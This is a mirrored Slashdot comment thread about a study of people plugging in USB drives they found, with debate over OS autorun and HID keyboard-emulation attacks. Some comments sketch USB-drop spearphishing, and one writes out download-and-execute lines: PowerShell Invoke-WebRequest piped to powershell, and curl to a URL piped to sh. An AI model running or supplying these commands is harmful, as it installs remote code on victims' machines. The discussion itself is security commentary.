Slashdot Mirror
A Lot of People Carelessly Plug In Random USB Drives Into Their Computers (vice.com)
An anonymous reader writes: Scientists have proven that a lot of people will carelessly plug in a USB drive found on the ground, exposing themselves to potential infections from malware. The researchers dropped 297 USB flash drives on a university campus and saw that in 48% of the cases, people picked them up, plugged them in, and opened files from the drive on their computers. Should such people be mocked? Would you plug in a USB drive that you found on the ground? Bruce Schneier, an American cryptographer, computer security and privacy specialist makes a good point: People get USB sticks all the time. The problem isn't that people are idiots, that they should know that a USB stick found on the street is automatically bad and a USB stick given away at a trade show is automatically good. The problem is that the OS trusts random USB sticks. The problem is that the OS will automatically run a program that can install malware from a USB stick. The problem is that it isn't safe to plug a USB stick into a computer.
Never know what STDs are there, but YOLO
My guess is a fair amount of people open them just in an attempt to ID the owner so they can return it.
You pretty much need to disable it yourself, which means you need to know to do it.
Microsoft still treats auto-run like it's not a terrible idea.
It's actually kind of scary that anybody would keep doing that.
As far as I can see, Windows still excitedly runs anything it sees.
Lost at C:>. Found at C.
1) Given: People will take a random USB stick and plug it into a computer.
2) Conclusion: Only a moron will design an Operating system that automatically runs software on a USB stick. Any sane OS designer should declare all USB sticks to be suspect, and require an explicit confirmation before running any executable on it.
The minimal convenience of having auto-run for USB drives is far over-ridden by the huge security leak.
Design products for the people that will run it, not theoretical angels that will read and obey your instruction manuals - especially when they DO NOT COME WITH INSTRUCTION MANUALS anymore.
excitingthingstodo.blogspot.com
There is a scene in Mr. Robot where a girl dumps a bunch of infected USB stick in the parking lot of a police station, and a cop picks one up and plugs it into his computer. I thought this was rather far-fetched, but I guess not.
I feel sorry for people that don't drink, because when they get up in the morning, that's as good as they're gonna feel
I turned off autorun on any external media a long time ago, back when sony cd's were injecting rootkits under the guise of DRM circa 2005. Nothing on insertable media autoruns on my PC.
The larger threat isn't old school "autoplay.exe" style infections. The real fun is in storage media that compromises a host by mere virtue of popping up on the bus following insertion, with no visible userland code execution required. -PCP
This isn't just the OS; you can easily diddle USB devices with malware in their firmware that then diddles the host in ways that doesn't require an obviously too trusting OS such as the most popular one that continues in this manner well after the idea has been well and truly discredited.
In other words, "we", the people that design and make the hardware and the software and so on, keep on making promises we know are false to "users": "No training needed", "this OS is user friendly", "this hardware will do what you tell it to", and so on, and so forth. It's the industry that's at fault because all that "stupid stuff" the users do, we keep on telling them that it's quite right and go ahead... right up until we chastise them for having fallen for a scam or a virus or whatever. "Sure you can do that", 'but now the box is bleeping angrily', "don't do that then." Worst pavlov training ever.
So no, you really cannot blame "people" for this, nor "users". It's the engineers and perhaps moreso the companies employing the engineers.
That's why we have USB authorization. Since 2007.
What kind of dumb OS autoruns anything off of any volume the moment it's connected without any request from the user?
Oh right, Windows. Well, there's your problem.
-Forrest Cameranesi, Geek of all Trades
"I am Sam. Sam I am. I do not like trolls, flames, or spam."
First, malicious USB devices pretended to be CD readers because Windows would auto-run CDs but not mass storage (see U3, for supposedly non-malicious exploitation of this fact)
Then Windows started prompting the user before auto-run from CD drives also.
So now malicious USB devices present themselves as a keyboard and start typing commands (including hotkeys such as Win+R) to download and run malware off the net. USB keyboards can even interact with UAC prompts, even when presented on the Secure Desktop where software input emulation has no effect.
A security n00b I see. You assume that it'll detect as storage and automatically run some executable. It's not hard to make a USB stick recognize as a keyboard and then have it start running commands, including opening a web browser and downloading anything needed to compromise your system. Never forget what can be done with a simple keyboard.
Besides, Windows doesn't autorun anything, it pops up a dialog and asks the user what they want to do.
As a Canadian, I cannot trust either China nor the USA about spyware and trojans. This means that unless the USB drive is made of wood and smells like maple syrup, I don't trust it.
The problem is that the USB drive can identify as a different kind of device, like a keyboard, run commands, download and install software, and even interact with the security modal screens.
No good deed goes unpunished...
You can buy USB drives in bulk for under a buck a piece, they don't need to be high-capacity, a 128MB drive can hold a shitload of malware. $5 might be a bit on the expensive side to infect a random machine that may not even be your target, but $75 to infect 100 machines is cheap for a targeted attack.
APK quotes people (including myself) without context and should not be trusted. Just thought you should know.
No, the people are NOT stupid.
Logically a data drive should have data and only data from the computer's perspective, and not run any executables or scripts on it without first explicitly asking. It should be designed that way from the start. That's how Vulcans would design it.
The fact that it's so easy for hackers to bypass what SHOULD be normal and expected is a failure of the technology and/or standards, NOT of consumers.
Table-ized A.I.
Bit of a bootstrapping issue there. When you plug in your first mouse or keyboard, what would you use to click "yes"?
Socialism: a lie told by totalitarians and believed by fools.
Yeah right.
I'm not most people, but I did exactly this (with an SD card).
I went through photos on the card, managed to fine one that included a USPS package, transformed the image to read a partial name and was able to scan the barcode to get a zip, looked at other photos and compared them to Google/Bing maps and found the street but not the address, then found several profiles on the web, ultimately matching one photo to a Facebook account using a cropped version as the profile photo.
I then created a throwaway email account to create a throwaway Facebook account under the name of Natalie FoundUrSDCard or some such, messaged her and posted the uncropped version of her profile photo, and waited.
She responded and sent her uncle to come pick it up.
He did.
You assume that USB stick is a flash memory device. Being nasty, it tells the computer that it's a keyboard. Your computer almost certainly processes keyboard commands just like other computers do. I've built one of these.
It might be a pretty effective way to go spearphishing though. If you're trying to get into a specific high-value network, then this might be a great way to do it. Drop it outside the target office, label it something like "Private photos - do not view!" or something like that, and watch human nature take over.
Hopefully the administrator has properly hardened workstations against executing code on a random USB, but I'd bet a surprising number of networks would get infected in fairly short order.
Irony: Agile development has too much intertia to be abandoned now.
So buy the small drive and print 64GB on the outside.
Nullius in verba
OS should prompt to verify. "A new peripheral has been detected. It claims to be a keyboard. Is this correct?"
True, if you don't have a keyboard (and no mouse yet) you cannot tell the computer if you approve or disapprove.
A partial solution would be to display a message and give the user 90 seconds to respond.
"A new device that claims to be a keyboard has been detected (plugged in). If you don't reply within 90 seconds, the keyboard will be accepted."
Table-ized A.I.
Another solution: if a keyboard is already plugged in, prompt for a warning. If a keyboard is not plugged in, accept it.
"First they came for the slanderers and i said nothing."
Does your screwdriver jump up off your workbench and randomly start unscrewing things without asking first?
The problem isn't that you can run harmful code off a storage device, that's a know problem with an easy solution (don't be a moron). The problem is that the computer will AUTOMATICALLY run harmful code off a storage device by default unless you've done something to prevent it.
As long as a computer does what I ask it to, I can know what risks I'm taking, but if I can't even know if a USB stick is harmful until after it has done the harm, that's incredibly poor design.
That's basically what I did; I used the same chip used by the Arduino Nano, flashed with the Arduino bootloader, without the Arduino circuit board.
At first, I put it together to brute-force an Android PIN overnight. Then I adjusted the code slightly to keep a Chromebox from going into power saving mode, because the Chromebox was running a wall-mounted display.
Having a tiny USB device that acts as a keyboard and nothing more to do with it, mounting it in an old flash drive casing was the next logical step for a security geek like myself.
You put 10 spread around the parking lot with the name/logo of the company, or a competitor (or try both and see which hits best), and someone will "be nice" and try to see whose it is to return it, or something like that. The real reason scams don't work as well as they should is that scammers prey on the weak (419 scams), rather than preying on the good people.
And the people here claim that nothing can be hardened against USB. It could look like a memory stick, but have a keylogger that loads as a HID (often allowed for all), and has a USB-powered 3G modem for calling home and sending the keystrokes. Just blocking USB-loaded software won't do any good when you run into an attacker smarter than you.
Learn to love Alaska
There are a few characters missing from the code I posted. I don't have a Windows machine handy to test with at the moment, in order to catch any errors. It would actually be more like:
Win+R powershell -command 'Invoke-WebRequest http...
Invoke-WebRequest downloads a URL, like a browser would, but then we use the pipe character | to send the content of that URL to powershell. Powershell is kind of like cmd.exe, but more powerful. If you do Win+R cmd.exe you'll see what looks like a DOS prompt, where you can type commands. Powershell is that on steroids (and on crack).
Piping them together, you get "retrieve commands from http://tinyurl.com/jfjdhd and run them using powershell ".
The Linux/Unix/Mac version is similar:
curl http://tinyurl.com/hacker | sh
Curl gets whatever is at that URL and sends it to "sh". Sh, the shell, is the "DOS prompt" of Unix, and runs whatever commands that curl got from the internet.
That was some epically beautiful nerdiness right there.